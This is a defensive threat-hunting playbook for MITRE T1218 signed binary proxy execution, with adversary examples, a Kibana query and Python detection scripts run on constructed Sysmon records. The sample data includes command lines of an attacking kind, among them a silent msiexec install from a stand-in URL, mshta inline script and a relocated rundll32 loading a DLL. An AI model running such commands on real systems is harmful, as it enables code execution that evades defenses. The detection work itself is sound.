# T1218 Signed Binary Proxy Execution

-----------------------------------------------------------------------

## Technique Description

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

## Technique Detection

Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.
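The argument comparison described above, as an added example that is not part of the original playbook: the Python below scores constructed Sysmon Event ID 1 (process creation) records for three signed binaries the page's adversary examples use (rundll32.exe, msiexec.exe, mshta.exe). It matches on `OriginalFileName` rather than the path so that a copied or renamed binary is still recognised, and flags rundll32 targets that fall outside a baseline of known-good `dll,export` pairs, DLLs loaded from user-writable paths, msiexec pulling a package from a URL, and mshta running inline script. The baseline set, the sample records and the `example.invalid` host are assumptions made for the example, not data from any environment.

```python
"""Score Sysmon Event ID 1 (process creation) records for anomalous use of
signed proxy-execution binaries.  Added example: the records and the
known-good baseline below are constructed, not taken from any environment."""
import ntpath
import re

# OriginalFileName comes from the PE version resource and survives copying or
# renaming the executable, which is why it is matched instead of the path.
PROXY_BINARIES = {"RUNDLL32.EXE", "MSIEXEC.EXE", "MSHTA.EXE"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
URL_RE = re.compile(r"https?://", re.I)
SCRIPT_RE = re.compile(r"\b(?:vbscript|javascript):", re.I)

# Assumed baseline of (dll basename, export) pairs seen in prior known-good
# rundll32 history; a real hunt derives this from the environment's own logs.
RUNDLL32_BASELINE = {
    ("shell32.dll", "control_rundll"),
    ("shell32.dll", "openas_rundll"),
    ("user32.dll", "lockworkstation"),
}


def strip_program(cmdline):
    """Drop the leading program token (quoted or bare) and return the arguments."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def rundll32_target(args):
    """Parse 'dll,export [args]' into (dll, export); None when no DLL is given."""
    if not args:
        return None
    dll, _, tail = args.partition(",")
    export = tail.split(None, 1)[0] if tail.split() else ""
    return dll.strip().strip('"'), export.strip('"')


def analyze(event):
    """Return a list of findings (empty means nothing anomalous) for one record."""
    findings = []
    original = event.get("OriginalFileName", "").upper()
    if original not in PROXY_BINARIES:
        return findings
    image = event["Image"].lower()
    # 1. Relocated or renamed copy (the CozyCar dropper copies rundll32.exe
    #    into its own install directory before using it).
    if not image.startswith(SYSTEM_DIRS) or ntpath.basename(image) != original.lower():
        findings.append(f"{original} running as {event['Image']}")
    args = strip_program(event.get("CommandLine", ""))
    if original == "RUNDLL32.EXE":
        target = rundll32_target(args)
        if target is None:
            findings.append("rundll32 started with no DLL argument")
        else:
            dll, export = target
            base = ntpath.basename(dll).lower()
            if (base, export.lower()) not in RUNDLL32_BASELINE:
                findings.append(f"rundll32 target outside baseline: {base},{export}")
            if any(d in dll.lower() for d in USER_WRITABLE):
                findings.append(f"rundll32 loading from user-writable path: {dll}")
            if not base.endswith(".dll"):
                findings.append(f"rundll32 loading a non-.dll file: {dll}")
    elif original == "MSIEXEC.EXE" and URL_RE.search(args):
        findings.append(f"msiexec installing from a URL: {args}")
    elif original == "MSHTA.EXE" and (URL_RE.search(args) or SCRIPT_RE.search(args)):
        findings.append(f"mshta running inline script or remote content: {args}")
    return findings


def hunt(events):
    """Return [(index, findings)] for every record that produced findings."""
    out = []
    for i, e in enumerate(events):
        f = analyze(e)
        if f:
            out.append((i, f))
    return out


SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1 records
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl'},
    {"Image": r"C:\Users\bob\AppData\Roaming\Sys\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Roaming\Sys\core.dll,Start"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "MSIEXEC.EXE",
     "CommandLine": "msiexec.exe /q /i http://example.invalid/pkg.msi"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe report.txt"},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": 'mshta.exe vbscript:Execute("MsgBox 1")'},
]

if __name__ == "__main__":
    for idx, found in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"])
        for f in found:
            print("   ", f)
```

The first record (a Control Panel applet opened through shell32.dll) produces no findings; the relocated rundll32 copy produces three, which is the shape a hunter wants: the relocation alone is enough to escalate even when the command line looks ordinary.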

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1218)



-----------------------------------------------------------------------

## Metadata

  * **Last Updated Date:** 8 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- Malicious actors may abuse signed binary executables (Known/observed LOLBins) to run malicious code and bypass process and/or signature-based defenses.

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

#### Gamaredon
- InvisiMole can register itself for execution and persistence via the Control Panel.
- Pteranodon executes functions using rundll32.exe.

#### Sandworm
- Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.

#### APT29
- The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.
- FatDuke can execute via rundll32.
- PolyglotDuke can be executed using rundll32.exe.
- PowerDuke uses rundll32.exe to load.

#### APT28
- CORESHELL is installed via execution of rundll32 with an export named "init" or "InitW".

#### Turla
- Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.

## Detection Blindspots

- Analytics keyed on process name or image path miss a signed binary that has been copied or renamed (the CozyCar dropper copies rundll32.exe into its own install directory before using it). Sysmon process-creation events carry the `OriginalFileName` from the PE version resource; match on that, or on file hash, rather than on the path.
- The argument comparison in Technique Detection requires command-line logging: Sysmon Event ID 1, or Security 4688 with the "Include command line in process creation events" policy enabled. Without it only the binary name is visible.
- Host Analytic 1 excludes RFC1918 destinations, so a connection staged through an internal host (proxy, relay or another compromised machine) is not surfaced by it.

## Analytical References

- https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/
- https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
- https://www.f-secure.com/documents/996508/1030745/CozyDuke
- https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
- https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
- http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf
- https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf
- [Known/Observed LOLBins (github)](https://lolbas-project.github.io/)
- https://redcanary.com/threat-detection-report/techniques/mshta/
- https://redcanary.com/threat-detection-report/techniques/rundll32/
- https://eqllib.readthedocs.io/en/latest/analytics.html

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

#### Analytic 1

  * **Information:** Network Connection via Signed Binary

  * **Source:** Windows Audits, Sysmon

  * **Tool:** Kibana

  * **Notes:** The four binaries are chosen because they almost never initiate outbound connections in legitimate use, so an external destination is a strong signal on its own. rundll32.exe, mshta.exe and msiexec.exe generate far more benign network activity and need the argument/baseline comparison from Technique Detection before alerting. Sysmon Event ID 3 records `Image` but not `OriginalFileName`, so a copied or renamed binary will not match `process.name`; pivot on the process GUID to the Event ID 1 record to check the original file name and signature. The exclusion list below covers only the three RFC1918 ranges, not loopback, link-local or IPv6 unique-local addresses.

  * **Query:** ```process.name:(expand.exe or extrac32.exe or ieexec.exe or makecab.exe) and event.action:"Network connection detected (rule: NetworkConnect)" and not destination.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)```
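The query above applied in Python, as an added example that is not part of the original playbook: `matches_query` reproduces the Kibana filter over constructed Sysmon Event ID 3 records using ECS field names, and `matches_tightened` adds the loopback, link-local and IPv6 unique-local exclusions that the three RFC1918 CIDRs do not cover. The records, including the 203.0.113.10 destination (documentation range), are constructed for the example.

```python
"""Apply the 'Network Connection via Signed Binary' analytic to Sysmon
Event ID 3 records.  Added example with constructed records: matches_query()
mirrors the Kibana query, matches_tightened() adds exclusions it lacks."""
import ipaddress

NETCONNECT = "Network connection detected (rule: NetworkConnect)"
WATCHED = {"expand.exe", "extrac32.exe", "ieexec.exe", "makecab.exe"}
RFC1918 = [ipaddress.ip_network(c) for c in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Ranges the query does not exclude but a tightened version should: loopback,
# link-local (v4 and v6) and IPv6 unique-local.
EXTRA_LOCAL = [ipaddress.ip_network(c) for c in
               ("127.0.0.0/8", "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]


def in_any(ip, networks):
    """True when the address falls inside any of the given networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr.version == n.version and addr in n for n in networks)


def matches_query(event):
    """Exactly the Kibana query: watched name, NetworkConnect, not RFC1918."""
    return (event["process.name"].lower() in WATCHED
            and event["event.action"] == NETCONNECT
            and not in_any(event["destination.ip"], RFC1918))


def matches_tightened(event):
    """Same filter, but also drop loopback, link-local and ULA destinations."""
    return matches_query(event) and not in_any(event["destination.ip"], EXTRA_LOCAL)


def run(events, predicate):
    """Indexes of the records the predicate flags."""
    return [i for i, e in enumerate(events) if predicate(e)]


SAMPLE_EVENTS = [  # constructed ECS-style Sysmon Event ID 3 records
    {"process.name": "makecab.exe", "event.action": NETCONNECT, "destination.ip": "203.0.113.10"},
    {"process.name": "expand.exe", "event.action": NETCONNECT, "destination.ip": "10.1.2.3"},
    {"process.name": "extrac32.exe", "event.action": NETCONNECT, "destination.ip": "127.0.0.1"},
    {"process.name": "ieexec.exe", "event.action": NETCONNECT, "destination.ip": "fe80::1"},
    {"process.name": "chrome.exe", "event.action": NETCONNECT, "destination.ip": "203.0.113.10"},
    # A process-creation record for a watched binary: wrong event.action, no destination.
    {"process.name": "makecab.exe", "event.action": "Process Create (rule: ProcessCreate)"},
]

if __name__ == "__main__":
    print("query    :", run(SAMPLE_EVENTS, matches_query))
    print("tightened:", run(SAMPLE_EVENTS, matches_tightened))
```

The loopback and link-local records match the query as written and are the false positives the tightened predicate removes; the expand.exe connection to 10.1.2.3 is invisible to both, which is the internal-relay blind spot noted above.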

-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Information Here

#### Analytic 1

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

#### Analytic 2

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

